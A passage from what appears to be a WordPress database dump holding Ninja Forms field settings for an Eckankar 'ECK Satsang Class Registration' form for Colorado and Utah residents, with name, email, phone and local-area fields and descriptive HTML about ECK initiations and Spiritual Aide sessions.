Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}}'),(17930,656,'container_class','','container_class',''),(17931,656,'element_class','','element_class',''),(17932,656,'admin_label','','admin_label',''),(17933,656,'help_text','','help_text',''),(17934,656,'drawerDisabled','','drawerDisabled',''),(17935,656,'field_label','Select One Class Per Registrant','field_label','Select One Class Per Registrant'),(17936,656,'field_key','select_one_class_per_registrant_1658696832524','field_key','select_one_class_per_registrant_1658696832524'),(17937,657,'editActive','','editActive',''),(17938,657,'order','1','order','1'),(17939,657,'idAttribute','id','idAttribute','id'),(17940,657,'label','HTML','label','HTML'),(17941,657,'type','html','type','html'),(17942,657,'default','<p class=\"\" style=\"font-family: Raleway; font-weight: 600; font-size: 33px; color: #1d5791; margin-bottom: -8px;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\" align=\"center\">2023-2024<br>Colorado &amp; Utah</p><p class=\"\" style=\"font-family: Raleway; font-weight: 600; font-size: 43px; color: #1d5791; margin-bottom: -8px;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\" align=\"center\">ECK Satsang Class Registration</p><div style=\"line-height: 150%;padding-top: 16px;\"><div align=\"center\"><span style=\"font-size: 24px; line-height: 150%; color:#b8860b !important;\"><strong>This form is only for residents of Colorado and Utah. </strong></span><br><span style=\"font-size: 24px; line-height: 150%;\"><strong></strong></span></div><span style=\"font-size: 20px; line-height: 150%;\"><br></span></div><div style=\"line-height: 150%;font-size: 20px;color: #333333; background-color: #eaf7ff; padding: 10px; border: 1px solid #d7d7d7; box-shadow: rgba(0, 0, 0, 0.16) 0px 3px 6px, rgba(0, 0, 0, 0.23) 0px 3px 6px;\" align=\"center\"><b>NOTE: </b>Satsang Class registration must be completed by the 3rd class meeting.<br>After this date, registrations will no longer be accepted.<span style=\"font-size: 20px; line-height: 150%;\"><br></span></div>','default','<p class=\"\" style=\"font-family: Raleway; font-weight: 600; font-size: 33px; color: #1d5791; margin-bottom: -8px;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\" align=\"center\">2023-2024<br>Colorado &amp; Utah</p><p class=\"\" style=\"font-family: Raleway; font-weight: 600; font-size: 43px; color: #1d5791; margin-bottom: -8px;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\" align=\"center\">ECK Satsang Class Registration</p><div style=\"line-height: 150%;padding-top: 16px;\"><div align=\"center\"><span style=\"font-size: 24px; line-height: 150%; color:#b8860b !important;\"><strong>This form is only for residents of Colorado and Utah. </strong></span><br><span style=\"font-size: 24px; line-height: 150%;\"><strong></strong></span></div><span style=\"font-size: 20px; line-height: 150%;\"><br></span></div><div style=\"line-height: 150%;font-size: 20px;color: #333333; background-color: #eaf7ff; padding: 10px; border: 1px solid #d7d7d7; box-shadow: rgba(0, 0, 0, 0.16) 0px 3px 6px, rgba(0, 0, 0, 0.23) 0px 3px 6px;\" align=\"center\"><b>NOTE: </b>Satsang Class registration must be completed by the 3rd class meeting.<br>After this date, registrations will no longer be accepted.<span style=\"font-size: 20px; line-height: 150%;\"><br></span></div>'),(17943,657,'container_class','','container_class',''),(17944,657,'element_class','','element_class',''),(17945,657,'key','html_1632671894259','key','html_1632671894259'),(17946,657,'drawerDisabled','','drawerDisabled',''),(17947,657,'field_label','HTML','field_label','HTML'),(17948,657,'field_key','html_1632671894259','field_key','html_1632671894259'),(17949,658,'drawerDisabled','','drawerDisabled',''),(17950,658,'editActive','','editActive',''),(17951,658,'order','9','order','9'),(17952,658,'idAttribute','id','idAttribute','id'),(17953,658,'label','ECK Member Classes Available for 2023-2024','label','ECK Member Classes Available for 2023-2024'),(17954,658,'type','html','type','html'),(17955,658,'default','<div style=\"font-size: 20px;color: #333333; background-color: #f3f2f2; padding: 10px; border: 1px solid #d7d7d7;line-height: 95%;\"><p class=\"\" style=\"font-family: Open Sans; font-size: 20px; text-transform: none; color: rgb(29, 87, 145); padding: 0px 0px 8px; margin-top: 10px; margin-bottom: 10px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\"><b>Classes are open to all Chelas residing within Colorado and Utah. Available class formats include:</b></p><ul><li style=\"font-family: Open Sans; font-weight: 600; font-size: 21px; text-transform: none; color: rgb(65, 67, 68); padding: 0px 0px 8px; margin-top: 10px; margin-bottom: 10px;\"><span style=\"font-weight: normal;\">In Person Classes<br></span></li><li style=\"font-family: Open Sans; font-weight: 600; font-size: 21px; text-transform: none; color: rgb(65, 67, 68); padding: 0px 0px 8px; margin-top: 10px; margin-bottom: 10px;\"><span style=\"font-weight: normal;\">Zoom Classes<br></span></li>  <li style=\"font-family: Open Sans; font-weight: 600; font-size: 21px; text-transform: none; color: rgb(65, 67, 68); padding: 0px 0px 8px; margin-top: 10px; margin-bottom: 10px;\"><span style=\"font-weight: normal;\">Hybrid Classes  <span style=\"font-size:19px\">(<i>Hybrid events combine in person and online attendance</i></span>)</span><br><em></em></li></ul></div>','default','<div style=\"font-size: 20px;color: #333333; background-color: #f3f2f2; padding: 10px; border: 1px solid #d7d7d7;line-height: 95%;\"><p class=\"\" style=\"font-family: Open Sans; font-size: 20px; text-transform: none; color: rgb(29, 87, 145); padding: 0px 0px 8px; margin-top: 10px; margin-bottom: 10px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\"><b>Classes are open to all Chelas residing within Colorado and Utah. Available class formats include:</b></p><ul><li style=\"font-family: Open Sans; font-weight: 600; font-size: 21px; text-transform: none; color: rgb(65, 67, 68); padding: 0px 0px 8px; margin-top: 10px; margin-bottom: 10px;\"><span style=\"font-weight: normal;\">In Person Classes<br></span></li><li style=\"font-family: Open Sans; font-weight: 600; font-size: 21px; text-transform: none; color: rgb(65, 67, 68); padding: 0px 0px 8px; margin-top: 10px; margin-bottom: 10px;\"><span style=\"font-weight: normal;\">Zoom Classes<br></span></li>  <li style=\"font-family: Open Sans; font-weight: 600; font-size: 21px; text-transform: none; color: rgb(65, 67, 68); padding: 0px 0px 8px; margin-top: 10px; margin-bottom: 10px;\"><span style=\"font-weight: normal;\">Hybrid Classes  <span style=\"font-size:19px\">(<i>Hybrid events combine in person and online attendance</i></span>)</span><br><em></em></li></ul></div>'),(17956,658,'container_class','','container_class',''),(17957,658,'element_class','','element_class',''),(17958,658,'key','eck_member_classes_available_for_2023-2024_1693928528054','key','eck_member_classes_available_for_2023-2024_1693928528054'),(17959,658,'field_label','ECK Member Classes Available for 2022-2023','field_label','ECK Member Classes Available for 2022-2023'),(17960,658,'field_key','eck_member_classes_available_for_2022-2023_1660414260469','field_key','eck_member_classes_available_for_2022-2023_1660414260469'),(17962,659,'objectType','Field','objectType','Field'),(17970,659,'desc_el','div','desc_el','div'),(17971,659,'show_desc','0','show_desc','0'),(17972,659,'desc_pos','none','desc_pos','none'),(17973,659,'desc_text','','desc_text',''),(17974,659,'element_class','','element_class',''),(17975,659,'default','<p></p><p></p><p></p><h3><span style=\"color: #23507d;\"><strong>Loveland Initiator and ESA\'s</strong></span></h3><strong>ECK Initiations</strong> link Soul directly to the ECK, Divine Spirit, for spiritual liberation in this lifetime. Each initiation is a sacred and joyous occasion for a spiritual seeker, for it brings an ever-increasing knowledge of and love for God. And it gives new insights into why certain things in your life play out as they do.<p></p><p><strong>ECK Spiritual Aide</strong> sessions, though not counseling, can help you find your own answers in challenging situations through the personal guidance of Divine Spirit. The ESA session is conducted by an ECK Spiritual Aide, (ESA) who is an ECK cleric specially appointed and trained to offer this assistance. There are no fees for the above services, but donations to Eckankar are accepted. Because of the sacred nature of these events, the initiators and ESA\'s will call you instead of sending an email. A personal call ensures your privacy. If you have a pink slip for an ECK Initiation or would like to talk to an ECK Spiritual Aide, just select the person you would like to contact below.</p>','default','<p></p><p></p><p></p><h3><span style=\"color: #23507d;\"><strong>Loveland Initiator and ESA\'s</strong></span></h3><strong>ECK Initiations</strong> link Soul directly to the ECK, Divine Spirit, for spiritual liberation in this lifetime. Each initiation is a sacred and joyous occasion for a spiritual seeker, for it brings an ever-increasing knowledge of and love for God. And it gives new insights into why certain things in your life play out as they do.<p></p><p><strong>ECK Spiritual Aide</strong> sessions, though not counseling, can help you find your own answers in challenging situations through the personal guidance of Divine Spirit. The ESA session is conducted by an ECK Spiritual Aide, (ESA) who is an ECK cleric specially appointed and trained to offer this assistance. There are no fees for the above services, but donations to Eckankar are accepted. Because of the sacred nature of these events, the initiators and ESA\'s will call you instead of sending an email. A personal call ensures your privacy. If you have a pink slip for an ECK Initiation or would like to talk to an ECK Spiritual Aide, just select the person you would like to contact below.</p>'),(17976,659,'key','html_141','key','html_141'),(17977,659,'container_class','','container_class',''),(17978,659,'drawerDisabled','','drawerDisabled',''),(17979,659,'parent_id','2','parent_id','2'),(17980,659,'field_label','Text','field_label','Text'),(17981,659,'field_key','html_141','field_key','html_141'),(17982,659,'idAttribute','id','idAttribute','id'),(17983,660,'objectType','Field','objectType','Field'),(17984,660,'objectDomain','fields','objectDomain','fields'),(17985,660,'editActive','','editActive',''),(17986,660,'order','2','order','2'),(17987,660,'type','textbox','type','textbox'),(17988,660,'def_id','6','def_id','6'),(17989,660,'label','First Name','label','First Name'),(17990,660,'label_pos','above','label_pos','above'),(17991,660,'mask','','mask',''),(17992,660,'datepicker','0','datepicker','0'),(17993,660,'first_name','1','first_name','1'),(17994,660,'last_name','0','last_name','0'),(17995,660,'from_name','0','from_name','0'),(17996,660,'user_info_field_group','1','user_info_field_group','1'),(17997,660,'show_help','0','show_help','0'),(17998,660,'help_text','','help_text',''),(17999,660,'calc_auto_include','0','calc_auto_include','0'),(18000,660,'calc_option','0','calc_option','0'),(18001,660,'placeholder','','placeholder',''),(18002,660,'user_address_1','','user_address_1',''),(18003,660,'user_address_2','','user_address_2',''),(18004,660,'user_city','','user_city',''),(18005,660,'user_zip','','user_zip',''),(18006,660,'user_phone','','user_phone',''),(18007,660,'user_email','','user_email',''),(18008,660,'disable_input','0','disable_input','0'),(18009,660,'input_limit','','input_limit',''),(18010,660,'input_limit_type','char','input_limit_type','char'),(18011,660,'input_limit_msg','','input_limit_msg',''),(18012,660,'user_state','0','user_state','0'),(18013,660,'autocomplete_off','0','autocomplete_off','0'),(18014,660,'num_sort','0','num_sort','0'),(18015,660,'admin_label','','admin_label',''),(18016,660,'user_info_field_group_name','','user_info_field_group_name',''),(18017,660,'user_info_field_group_custom','','user_info_field_group_custom',''),(18018,660,'show_desc','0','show_desc','0'),(18019,660,'desc_pos','none','desc_pos','none'),(18020,660,'desc_text','','desc_text',''),(18021,660,'element_class','','element_class',''),(18022,660,'required','1','required','1'),(18023,660,'key','textbox_142','key','textbox_142'),(18024,660,'default','','default',''),(18025,660,'container_class','one-half first','container_class','one-half first'),(18026,660,'manual_key','','manual_key',''),(18027,660,'custom_mask','','custom_mask',''),(18028,660,'parent_id','2','parent_id','2'),(18029,660,'field_label','First Name','field_label','First Name'),(18030,660,'field_key','textbox_142','field_key','textbox_142'),(18031,660,'custom_name_attribute','','custom_name_attribute',''),(18032,660,'personally_identifiable','','personally_identifiable',''),(18033,660,'value','','value',''),(18034,660,'idAttribute','id','idAttribute','id'),(18035,661,'objectType','Field','objectType','Field'),(18036,661,'objectDomain','fields','objectDomain','fields'),(18037,661,'editActive','','editActive',''),(18038,661,'order','3','order','3'),(18039,661,'type','lastname','type','lastname'),(18040,661,'def_id','7','def_id','7'),(18041,661,'label','Last Name','label','Last Name'),(18042,661,'label_pos','above','label_pos','above'),(18043,661,'mask','','mask',''),(18044,661,'datepicker','0','datepicker','0'),(18045,661,'first_name','0','first_name','0'),(18046,661,'from_name','0','from_name','0'),(18047,661,'user_info_field_group','1','user_info_field_group','1'),(18048,661,'show_help','0','show_help','0'),(18049,661,'help_text','','help_text',''),(18050,661,'calc_auto_include','0','calc_auto_include','0'),(18051,661,'calc_option','0','calc_option','0'),(18052,661,'placeholder','','placeholder',''),(18053,661,'user_address_1','','user_address_1',''),(18054,661,'user_address_2','','user_address_2',''),(18055,661,'user_city','','user_city',''),(18056,661,'user_zip','','user_zip',''),(18057,661,'user_phone','','user_phone',''),(18058,661,'user_email','','user_email',''),(18059,661,'disable_input','0','disable_input','0'),(18060,661,'input_limit','','input_limit',''),(18061,661,'input_limit_type','char','input_limit_type','char'),(18062,661,'input_limit_msg','','input_limit_msg',''),(18063,661,'user_state','0','user_state','0'),(18064,661,'autocomplete_off','0','autocomplete_off','0'),(18065,661,'num_sort','0','num_sort','0'),(18066,661,'admin_label','','admin_label',''),(18067,661,'user_info_field_group_name','','user_info_field_group_name',''),(18068,661,'user_info_field_group_custom','','user_info_field_group_custom',''),(18069,661,'show_desc','0','show_desc','0'),(18070,661,'desc_pos','none','desc_pos','none'),(18071,661,'desc_text','','desc_text',''),(18072,661,'element_class','','element_class',''),(18073,661,'required','1','required','1'),(18074,661,'key','lastname_143','key','lastname_143'),(18075,661,'default','','default',''),(18076,661,'container_class','one-half','container_class','one-half'),(18077,661,'parent_id','2','parent_id','2'),(18078,661,'field_label','Last Name','field_label','Last Name'),(18079,661,'field_key','lastname_143','field_key','lastname_143'),(18080,661,'custom_name_attribute','lname','custom_name_attribute','lname'),(18081,661,'personally_identifiable','1','personally_identifiable','1'),(18082,661,'value','','value',''),(18083,661,'idAttribute','id','idAttribute','id'),(18084,662,'objectType','Field','objectType','Field'),(18085,662,'objectDomain','fields','objectDomain','fields'),(18086,662,'editActive','','editActive',''),(18087,662,'order','4','order','4'),(18088,662,'type','email','type','email'),(18089,662,'def_id','14','def_id','14'),(18090,662,'label','Email','label','Email'),(18091,662,'label_pos','above','label_pos','above'),(18092,662,'mask','','mask',''),(18093,662,'datepicker','0','datepicker','0'),(18094,662,'first_name','0','first_name','0'),(18095,662,'last_name','0','last_name','0'),(18096,662,'from_name','0','from_name','0'),(18097,662,'user_address_1','0','user_address_1','0'),(18098,662,'user_address_2','0','user_address_2','0'),(18099,662,'user_city','0','user_city','0'),(18100,662,'user_zip','0','user_zip','0'),(18101,662,'user_phone','0','user_phone','0'),(18102,662,'user_info_field_group','1','user_info_field_group','1'),(18103,662,'show_help','0','show_help','0'),(18104,662,'help_text','','help_text',''),(18105,662,'calc_auto_include','0','calc_auto_include','0'),(18106,662,'calc_option','0','calc_option','0'),(18107,662,'placeholder','','placeholder',''),(18108,662,'disable_input','0','disable_input','0'),(18109,662,'input_limit','','input_limit',''),(18110,662,'input_limit_type','char','input_limit_type','char'),(18111,662,'input_limit_msg','','input_limit_msg',''),(18112,662,'user_state','0','user_state','0'),(18113,662,'autocomplete_off','0','autocomplete_off','0'),(18114,662,'num_sort','0','num_sort','0'),(18115,662,'admin_label','','admin_label',''),(18116,662,'user_info_field_group_name','','user_info_field_group_name',''),(18117,662,'user_info_field_group_custom','','user_info_field_group_custom',''),(18118,662,'show_desc','0','show_desc','0'),(18119,662,'desc_pos','none','desc_pos','none'),(18120,662,'desc_text','','desc_text',''),(18121,662,'element_class','','element_class',''),(18122,662,'required','1','required','1'),(18123,662,'key','email_144','key','email_144'),(18124,662,'default','','default',''),(18125,662,'container_class','one-half first','container_class','one-half first'),(18126,662,'parent_id','2','parent_id','2'),(18127,662,'field_label','Email','field_label','Email'),(18128,662,'field_key','email_144','field_key','email_144'),(18129,662,'custom_name_attribute','email','custom_name_attribute','email'),(18130,662,'personally_identifiable','1','personally_identifiable','1'),(18131,662,'value','','value',''),(18132,662,'idAttribute','id','idAttribute','id'),(18133,663,'objectType','Field','objectType','Field'),(18134,663,'objectDomain','fields','objectDomain','fields'),(18135,663,'editActive','','editActive',''),(18136,663,'order','5','order','5'),(18137,663,'type','phone','type','phone'),(18138,663,'def_id','15','def_id','15'),(18139,663,'label','Phone','label','Phone'),(18140,663,'label_pos','above','label_pos','above'),(18141,663,'mask','(999) 999-9999','mask','(999) 999-9999'),(18142,663,'datepicker','0','datepicker','0'),(18143,663,'first_name','0','first_name','0'),(18144,663,'last_name','0','last_name','0'),(18145,663,'from_name','0','from_name','0'),(18146,663,'user_address_1','0','user_address_1','0'),(18147,663,'user_address_2','0','user_address_2','0'),(18148,663,'user_city','0','user_city','0'),(18149,663,'user_zip','0','user_zip','0'),(18150,663,'user_email','0','user_email','0'),(18151,663,'user_info_field_group','1','user_info_field_group','1'),(18152,663,'show_help','0','show_help','0'),(18153,663,'help_text','','help_text',''),(18154,663,'calc_auto_include','0','calc_auto_include','0'),(18155,663,'calc_option','0','calc_option','0'),(18156,663,'placeholder','','placeholder',''),(18157,663,'disable_input','0','disable_input','0'),(18158,663,'input_limit','','input_limit',''),(18159,663,'input_limit_type','char','input_limit_type','char'),(18160,663,'input_limit_msg','','input_limit_msg',''),(18161,663,'user_state','0','user_state','0'),(18162,663,'autocomplete_off','0','autocomplete_off','0'),(18163,663,'num_sort','0','num_sort','0'),(18164,663,'admin_label','','admin_label',''),(18165,663,'user_info_field_group_name','','user_info_field_group_name',''),(18166,663,'user_info_field_group_custom','','user_info_field_group_custom',''),(18167,663,'show_desc','0','show_desc','0'),(18168,663,'desc_pos','none','desc_pos','none'),(18169,663,'desc_text','','desc_text',''),(18170,663,'element_class','','element_class',''),(18171,663,'required','1','required','1'),(18172,663,'key','phone_145','key','phone_145'),(18173,663,'default','','default',''),(18174,663,'container_class','one-half','container_class','one-half'),(18175,663,'manual_key','','manual_key',''),(18176,663,'custom_mask','','custom_mask',''),(18177,663,'parent_id','2','parent_id','2'),(18178,663,'field_label','Phone','field_label','Phone'),(18179,663,'field_key','phone_145','field_key','phone_145'),(18180,663,'custom_name_attribute','phone','custom_name_attribute','phone'),(18181,663,'personally_identifiable','1','personally_identifiable','1'),(18182,663,'value','','value',''),(18183,663,'idAttribute','id','idAttribute','id'),(18184,664,'objectType','Field','objectType','Field'),(18185,664,'objectDomain','fields','objectDomain','fields'),(18186,664,'editActive','','editActive',''),(18187,664,'order','6','order','6'),(18188,664,'type','listselect','type','listselect'),(18189,664,'label','Your Local Area','label','Your Local Area'),(18190,664,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(18191,664,'label_pos','above','label_pos','above'),(18192,664,'list_type','dropdown','list_type','dropdown'),(18193,664,'multi_size','5','multi_size','5'),(18194,664,'list_show_value','1','list_show_value','1'),(18195,664,'list','a:0:{}','list','a:0:{}'),(18196,664,'user_info_field_group','','user_info_field_group',''),(18197,664,'calc_auto_include','0','calc_auto_include','0'),(18198,664,'user_state','0','user_state','0'),(18199,664,'num_sort','0','num_sort','0'),(18200,664,'admin_label','','admin_label',''),(18201,664,'show_help','0','show_help','0'),(18202,664,'help_text','','help_text',''),(18203,664,'show_desc','0','show_desc','0'),(18204,664,'desc_pos','none','desc_pos','none'),(18205,664,'desc_text','','desc_text',''),(18206,664,'element_class','','element_class',''),(18207,664,'required','1','required','1'),(18208,664,'options','a:8:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Boulder\";s:5:\"value\";s:7:\"Boulder\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:10:\"Co Springs\";s:5:\"value\";s:10:\"Co Springs\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:3;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:6:\"Denver\";s:5:\"value\";s:6:\"Denver\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:4;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Loveland\";s:5:\"value\";s:8:\"Loveland\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:5;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Western Slope\";s:5:\"value\";s:13:\"Western Slope\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> 